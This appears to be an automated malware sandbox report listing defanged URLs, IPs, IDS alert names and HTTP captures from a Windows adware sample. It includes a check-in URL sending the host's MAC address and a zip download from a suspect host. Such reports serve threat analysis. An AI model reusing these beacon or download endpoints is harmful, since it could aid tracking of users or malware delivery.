hxxp://pos.baidu.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=791141dc1b3cdefb&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511 123.125.115.99
hxxp://ubmcmm.baidustatic.com/media/v1/0f0002dsZcSR_Ik2MbXxf0.swf 183.60.131.49
hxxp://sm.kukuplay.com/SrcManager/roominfo?cid=693619_1371525642501&rid=null&rd=0.09363483125343919 60.214.208.219
hxxp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=2006558277&si=d1117fa0662883e59acd91ed0f03b7eb&st=1&v=1.0.59&lv=1&tt=五金 61.135.185.140
hxxp://ubmcmm.baidustatic.com/media/v1/0f000KXFAo9s7mobL64F3f.swf 183.60.131.49
hxxp://wn.pos.baidu.com/adx.php?c=cz04MTYzYzM2MjIwOTk5NGQ0AHQ9MTQwMjY4MDU2MwBzZT0xAGJ1PTEAcHJpY2U9VTVzMDh3QUt5cGw3akVwZ1c1SUE4bE96U3c1YlJwdW92NE1GdVEAY2htZD0xAHY9MQBpPTk3NzI2MzQ1
hxxp://eclick.baidu.com/a.js?did=2&ch=0&jk=6dc8052231d438f7&tn=text_default_336_280&n=67025059_1_cpr&js=c&tu=u1537511&word=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=0&ah=0&dt=1402680541&pt=23078&ps=20140613082903666&it=16391&vs=1&vt=16391&ft=23078&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=-2&left=-2&fs=1&total=3&rdm=1402680566775 123.125.115.164
hxxp://www.google-analytics.com/analytics.js
hxxp://static.ws.kukuplay.com/livevideo/v3.11.67/images/mini/bg.jpg 8.37.231.20
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=1611555924 42.120.219.171
hxxp://ubmcmm.baidustatic.com/media/v1/0f000AY4GuJTGCsxgDBTe0.swf 183.60.131.49
hxxp://www.google-analytics.com/collect?v=1&_v=j22&a=66525772&t=pageview&_s=1&dl=http://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null&dr=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&ul=en-us&de=utf-8&dt=风云直播MINI&sd=32-bit&sr=1276x846&vp=1010x550&je=0&fl=11.6 r602&_u=ME~&cid=2131950969.1402680550&tid=UA-42145803-1&z=1816808476
hxxp://pos.baidu.com/ecom?di=u1537506&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=3&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=357x3&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=2671&tlm=1398686606&tcn=1402680570&tpr=1402680568181&dpt=none&coa=&baidu_id= 123.125.115.99
hxxp://ubmcmm.baidustatic.com/media/v1/0f000Qb3PMHRPyvfvvYfG6.swf 183.60.131.49
hxxp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&ep=16047,16047&et=3&fl=11.6&ja=1&ln=en-us&lo=0&nv=0&rnd=440269574&si=d1117fa0662883e59acd91ed0f03b7eb&st=4&v=1.0.59&lv=1&tt=五金 61.135.185.140
hxxp://resource.dl.kukuplay.com/upload/fishrlv31.swf 122.228.251.106
hxxp://statistics.m0lxcdn.kukuplay.com/ok/?f=fengyunzhibo.com&c=693619_1371525642501 223.82.254.40
hxxp://wn.pos.baidu.com/adx.php?c=cz03YzllNGFlNjgyYWRkZWM0AHQ9MTQwMjY4MDU0MgBzZT0xAGJ1PTEAcHJpY2U9VTVzMDNnQUdncGw3akVwZ1c1SUE4cG9KTkw2cDBXXzk0TVVzV1EAY2htZD0xAHY9MQBpPWI1MjVhM2Nj
hxxp://ubmcmm.baidustatic.com/media/v1/0f000AY4Gp2TGCsxgDBTq0.swf 183.60.131.49
hxxp://pos.baidu.com/wh/o.htm?ltr=&cf=u 123.125.115.99
hxxp://resource.redirect.kukuplay.com/crossdomain.xml 223.202.47.69
hxxp://resource.redirect.kukuplay.com/upload/mobileAds4.swf 223.202.47.69
hxxp://ubmcmm.baidustatic.com/media/v1/0f0002dsZ58R_Ik2MbXxd0.jpg 183.60.131.49
hxxp://eclick.baidu.com/a.js?did=1&ch=0&jk=cadbaab171a45209&tn=text_default_336_280&n=67025059_1_cpr&js=c&tu=u1537509&word=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=0&ah=0&dt=1402680541&pt=26063&ps=20140613082900681&it=15891&vs=1&vt=15891&ft=26063&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=-2&left=-2&fs=1&total=3&rdm=1402680566744 123.125.115.164
hxxp://sm.fengyunzhibo.com/crossdomain.xml 115.231.18.6
hxxp://c.cnzz.com/core.php?web_id=2701879&t=z 42.120.219.6
hxxp://static.ws.kukuplay.com/livevideo/v3.11.67/images/mini/mini.png 8.37.231.20
hxxp://cp.sm.kukuplay.com/SrcManager/getchannelproperty/693619_1371525642501?fields=sname,lastSplitTime,cname,width,height,output&version=2.2.8.52867&rd=985027.0906463265 60.214.208.202
hxxp://wn.pos.baidu.com/adx.php?c=cz02MmI3NTk5ZjZjMTdkY2E3AHQ9MTQwMjY4MDUzOABzZT0xAGJ1PTEAcHJpY2U9VTVzMDJnQUpWTTk3akVwZ1c1SUE4blJ3dWx0ZnZPbGs3Mi1QNkEAY2htZD0xAHY9MQBpPTMyODcwZjY0
hxxp://pos.baidu.com/wh/o.htm?ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&cf=u 123.125.115.99
hxxp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null 1.99.192.17
hxxp://sm.kukuplay.com/SrcManager/ForbiddenTiming?op=getjson&types=comment&cid=693619_1371525642501&host=tv.aiqingzhihui.com 60.214.208.219
hxxp://p.x.baidu.com/ 123.125.65.152
hxxp://s6.cnzz.com/stat.php?id=2701879&web_id=2701879 1.99.192.15
hxxp://ubmcmm.baidustatic.com/media/v1/0f000DEUfQYMcAovJj_RMf.swf?url_type=1&snapshot=& 183.60.131.49
hxxp://ubmcmm.baidustatic.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_488077750=media/v1/0f000jtT4CGxjFHdyV6mBf.swf&id_283204763=media/v1/0f000QfY4TDI-RZtJ88Rf0.png&id_488102405=media/v1/0f000Qb3PMHRPyvfvvYfG6.swf&id_425012365=media/v1/0f000KXFAo9s7mobL64F3f.swf&id_451157897=media/v1/0f000AV1EG-sYD_d7YFHc6.jpg&id_488069842=media/v1/0f000AV1EJPWogCd7YFH9s.swf&snapshot=& 183.60.131.49
hxxp://ubmcmm.baidustatic.com/media/v1/0f000jtT4CGxjFHdyV6mBf.swf 183.60.131.49
hxxp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf 8.37.231.21
hxxp://wn.pos.baidu.com/adx.php?c=cz03MWUzZWY1YjIzZTYyNTUxAHQ9MTQwMjY4MDU2OQBzZT0xAGJ1PTEAcHJpY2U9VTVzMC1RQUVSRjU3akVwZ1c1SUE4czZqSHN0S3pQd0g2emVBTEEAY2htZD0xAHY9MQBpPTEzNDIwOTJh
hxxp://hzs17.cnzz.com/stat.htm?id=2701879&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=2120480958-1402680527-&showp=1276x846&st=0&sin=&t=&rnd=403236780 42.156.140.23
hxxp://hm.baidu.com/h.js?7aa2cb65324b0d2de0102de5dc741760 61.135.185.140
hxxp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=1330501783&si=7aa2cb65324b0d2de0102de5dc741760&st=3&su=http://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null&v=1.0.59&lv=1&tt=风云直播 61.135.185.140
hxxp://hm.baidu.com/h.js?d1117fa0662883e59acd91ed0f03b7eb 61.135.185.140
hxxp://static.ws.kukuplay.com/livevideo/v3.11.67/styles/mini.css 8.37.231.20
hxxp://pos.baidu.com/sync_pos.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 123.125.115.99
hxxp://wn.pos.baidu.com/adx.php?c=cz1hNGE2OWU2ZDI4YTg5MmU5AHQ9MTQwMjY4MDUzNQBzZT0xAGJ1PTEAcHJpY2U9VTVzMDF3QUl1R2Q3akVwZ1c1SUE4bF9TM3prZUV0OWt2a1hWb2cAY2htZD0xAHY9MQBpPTQxNTVkMTA2
hxxp://update.aiqingzhihui.com/up_17.html?06132028 125.39.21.33
hxxp://ubmcmm.baidustatic.com/media/v1/0f0000vLC1Ofnh0LFprLSs.swf 183.60.131.49
hxxp://ubmcmm.baidustatic.com/media/v1/0f000c60Ma_q1Fr10rMvif.gif 183.60.131.49
hxxp://hm.baidu.com/hm.js?e52aa1ba5cd407a52e95d6c7249929a9 61.135.185.140
hxxp://resource.redirect.kukuplay.com/upload/fishrlv31.swf 223.202.47.69
hxxp://ubmcmm.baidustatic.com/media/v1/0f000QfY4TDI-RZtJ88Rf0.png 183.60.131.49
hxxp://resource.m0wscdn.kukuplay.com/csplayer/csplayer15s0319.aspx 183.203.15.244
hxxp://resource.m0wscdn.kukuplay.com/xvideo/xvideo15s140529.aspx 183.203.15.244
hxxp://pos.baidu.com/ecom?di=u1537509&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=1&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=593&tlm=1398686606&tcn=1402680568&tpr=1402680568181&dpt=none&coa=&baidu_id= 123.125.115.99
hxxp://cpro.baidu.com/img/cpro_media_small.png 123.125.70.108
hxxp://pos.baidu.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=6dc8052231d438f7&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511 123.125.115.99
hxxp://wn.pos.baidu.com/adx.php?c=cz1hYjk2NDU4YTc5YTgwY2Y5AHQ9MTQwMjY4MDU2NABzZT0xAGJ1PTEAcHJpY2U9VTVzMDlBQU9xSDE3akVwZ1c1SUE4aDVGVHFhWkVBLThXVUlIeEEAY2htZD0xAHY9MQBpPThiZTBkNzI2
hxxp://drmcmm.baidu.com/media/id=PWRkPj6&gp=10&time=nHcdPHDsnHD4nf.png 123.125.65.55
hxxp://ubmcmm.baidustatic.com/media/v1/0f000Z60AW17JZtxZIQVsf.png 183.60.131.49
hxxp://4.fyimg.kukuplay.com/common/scripts/jquery-1.8.3.min.js 8.37.231.19
hxxp://resource.m0wscdn.kukuplay.com/crossdomain.xml 183.203.15.244
hxxp://tj.aiqingzhihui.com/xin/?ver=138 222.186.130.92
hxxp://w.x.baidu.com/go/full/1/70745 123.125.65.175
hxxp://tj.aiqingzhihui.com/tj.php?mac=000C2902CDFB&st=1&exez=pczh_107_306.exe&exef=%original file name%.exe&pass=44683dff641394194c05e3f3ca584214&url1=hxxp://ya.ru/&url2=ya 222.186.130.92
hxxp://www.fengyunzhibo.com/getMyVersion 119.134.255.167
hxxp://resource.dl.kukuplay.com/crossdomain.xml 122.228.251.106
hxxp://sm.fengyunzhibo.com/RequestTiming/rt?cid=693619_1371525642501&host=tv.aiqingzhihui.com&player_type=nor&rd=0.1444191988557577&newrandom=0.0995170371606946 115.231.18.6
hxxp://pcookie.cnzz.com/app.gif?&cna=0SIiDDGXogwCAcGK9Odn lhy 42.120.219.171
hxxp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=185369738&si=e52aa1ba5cd407a52e95d6c7249929a9&st=3&su=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&v=1.0.59&lv=1&tt=风云直播MINI 61.135.185.140
hxxp://pos.baidu.com/ecom?di=u1537506&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=3&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=&ltr=&lcr=&ps=357x3&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=7875&tlm=1398686606&tcn=1402680545&tpr=1402680537275&dpt=none&coa=&baidu_id= 123.125.115.99
hxxp://sm.kukuplay.com/SrcManager/channelInfo?fields=online&cid=693619_1371525642501 60.214.208.219
hxxp://static.ws.kukuplay.com/livevideo/v3.11.67/scripts/new_box.js 8.37.231.20
hxxp://resource.ws.kukuplay.com/plugins/requestviewrlv10.swf 8.37.231.21
hxxp://cpro.baidustatic.com/sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 123.125.70.108
hxxp://sm.kukuplay.com/crossdomain.xml 60.214.208.219
hxxp://ubmcmm.baidustatic.com/media/v1/0f000AV1EG-sYD_d7YFHc6.jpg 183.60.131.49
hxxp://control.sm.kukuplay.com/crossdomain.xml 223.202.47.72
hxxp://ubmcmm.baidustatic.com/media/v1/0f000KLx1mYZLI-ed9V_os.jpg 183.60.131.49
hxxp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=b4429549b809eb77&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509 123.125.115.99
hxxp://update.aiqingzhihui.com/0403/help1.html 125.39.21.33
hxxp://ubmcmm.baidustatic.com/media/v1/0f000Z60Ab17JZtxZIQVnf.swf 183.60.131.49
hxxp://s.cpro.baidu.com/s.htm?cproid=49F93F86C60D03A8D23F3919153C48A7&t=1402680571713
hxxp://static.m0dlcdn.kukuplay.com/support/mini/fyminiloader-min.js 183.203.15.244
hxxp://control.sm.kukuplay.com/SrcManager/dynchannelproperty?p=player&home=false&cid=693619_1371525642501&ptype=null&version=2.2.8.52867&rd=3809140.0312259793&from=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go= 223.202.47.72
hxxp://sm.kukuplay.com/SrcManager/channelInfo?fields=cname,pic1,url1&cid=693619_1371525642501 60.214.208.219
hxxp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=cadbaab171a45209&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509 123.125.115.99
hxxp://pos.baidu.com/ecom?di=u1537509&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=1&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=&ltr=&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=156&tlm=1398686606&tcn=1402680537&tpr=1402680537275&dpt=none&coa=&baidu_id= 123.125.115.99
hxxp://4.fyimg.kukuplay.com/common/scripts/DD_belatedPNG_0.0.8a-min.js 8.37.231.19
hxxp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4&ltr=&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=18a90fef6d4567e7&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506 123.125.115.99
hxxp://static.ws.kukuplay.com/livevideo/v3.11.67/styles/new_common.css 8.37.231.20
hxxp://static.ws.kukuplay.com/livevideo/v3.11.67/scripts/mini.js 8.37.231.20
hxxp://www.mnh.kaixin200.com/x/mnh/right/409/?spid=-37237366455960 14.33.133.118
hxxp://hm.baidu.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&lt=1402680551&nv=0&rnd=1753329783&si=d1117fa0662883e59acd91ed0f03b7eb&st=4&su=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&v=1.0.59&lv=2 61.135.185.140
hxxp://souhu.1htb.cn/goodpic_dae_619.zip 61.147.113.66
hxxp://cpro.baidustatic.com/cpro/ui/c.js 123.125.70.108
hxxp://resource.dl.kukuplay.com/upload/logoyanyi.FLV 122.228.251.106
img0bj1.m3ppcdn.kukuplay.com 211.142.30.26
10.fyimg.kukuplay.com 8.37.231.22
dtrp.download.iyuntian.com 123.125.65.150
ou.mny8.com.cn 222.88.93.108
cfg.download.iyuntian.com 123.125.65.132
udd.mny8.com.cn 125.43.78.117
res.download.iyuntian.com 123.125.65.129
jp.download.iyuntian.com 123.125.65.154
dtk.vsnis.com 222.88.93.101
realtime.monitor.kukuplay.com 124.228.254.113
rc.download.iyuntian.com 123.125.65.153
chatgrp.fengyunzhibo.com 123.138.36.132
tk.download.iyuntian.com 123.125.69.209
realtime.monitor.ppweb.com.cn 124.228.254.112
utk.download.iyuntian.com 123.125.65.147


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Suspicious User Agent Mozi11a
ET MALWARE suspicious User-Agent (vb wininet)
ET POLICY Outdated Windows Flash Version IE
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /ecom?di=u1537509&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=1&dds=&drs=3&dvi=1401358918<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=593&tlm=1398686606&tcn=1402680568&tpr=1402680568181&dpt=none&coa=&baidu_id= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:23 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1244
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:23 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
BAIDU_DUP2_define('request!u1537509_0',[],{deps:['nova/painter/inlayFi
xed1392089005'],data:{"id" : "u1537509","_isMlt" : 4,"sw" : 336,"sh" :
 280,"_html" : {"cec":"utf-8", "dai":"1", "cfv":"11", "cpa":"1", "col"
:"en-us", "dis":"0", "xuanting":"0", "n":"67025059_1_cpr", "conOP":"0"
, "scale":"", "skin":"", "rsi0":"336", "rsi1":"280", "rsi5":"4", "ltr"
:"hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html", "ltu":"ht
tp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0", "pc
s":"758x450", "rss0":"#FFFFFF", "rss1":"#FFFFFF", "rss2":"#0000FF", "r
ss3":"#444444", "rss4":"#008000", "rss5":"", "rss6":"#e10900", "rss7":
"", "rad":"", "pis":"10000x10000", "aurl":"", "psr":"1276x846", "pss":
"758x493", "tpr":"1402680568181", "lunum":"6", "ch":"0", "at":"6", "qn
":"b4429549b809eb77", "ps":"-2x-2", "tn":"text_default_336_280", "ts":
"1", "td_id":"1537509", "adn":"3", "cad":"1", "ccd":"32"},"_html_old" 
: "cpro_client=67025059_1_cpr|cpro_template=text_default_336_280|cpro_
lunum=6|cpro_h=280|cpro_w=336|cpro_xuanting=0|cpro_at=image|cpro_cbd=#
FFFFFF|cpro_cbg=#FFFFFF|cpro_ctitle=#0000FF|cpro_cdesc=#444444|cpro_cu
rl=#008000|cpro_cflush=#e10900|cpro_161=3|cpro_flush=4|cpro_cad=1","qn
" : "b4429549b809eb77","_qid" : "b4429549b809eb77"}});....
<<< skipped >>>

GET /ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=b4429549b809eb77&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:23 GMT
Content-Type: text/html
Content-Length: 10956
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:23 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<!-- 0|1; --&
gt;..<meta http-equiv="Content-Type" content="text/html; charset=UT
F-8" />..<meta http-equiv="X-UA-Compatible" content="IE=7" />
..<title>..............................</title>..<scrip
t language="javascript" src="hXXp://cpro.baidu.com/extra/text_flash/AC
_RunActiveContent.js"></script>..<style>..body{margin:0
;padding:0;}...uptown{position:relative;width:336px;height:280px;}...u
ptown #dish0{width:336px;height:280px;position:absolute;top:0;left:0;b
ackground-color:#fff;opacity:0;filter:alpha(opacity=0);}...uptown #dis
h1{width:336px;height:280px;position:absolute;top:0;left:0;border:#FFF
FFF solid 1px; }..a.logo{display:block;height:18px;width:26px;text-ali
gn:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cu
rsor:default;position:absolute;bottom:0px;right:0px;z-index:10;}...cpr
o a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(ena
bled=true, src="hXXp://cpro.baidu.com/img/cpro_media_small.png", sizin
gMetHTTP/1.1 200 OK..Server: nginx..Date: Fri, 13 Jun 2014 17:29:23 GM
T..Content-Type: text/html..Content-Length: 10956..Connection: Keep-Al
ive..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Sat Jun 14
 01:29:23 2014..Cache-Control: post-check=0, pre-check=0..Pragma: no-c
ache..P3P: CP=" OTI DSP COR IVA OUR IND COM "..<!DOCTYPE html P
<<< skipped >>>

GET /ecom?di=u1537506&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=3&dds=&drs=3&dvi=1401358918&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=&ltr=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=357x3&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=2671&tlm=1398686606&tcn=1402680570&tpr=1402680568181&dpt=none&coa=&baidu_id= HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
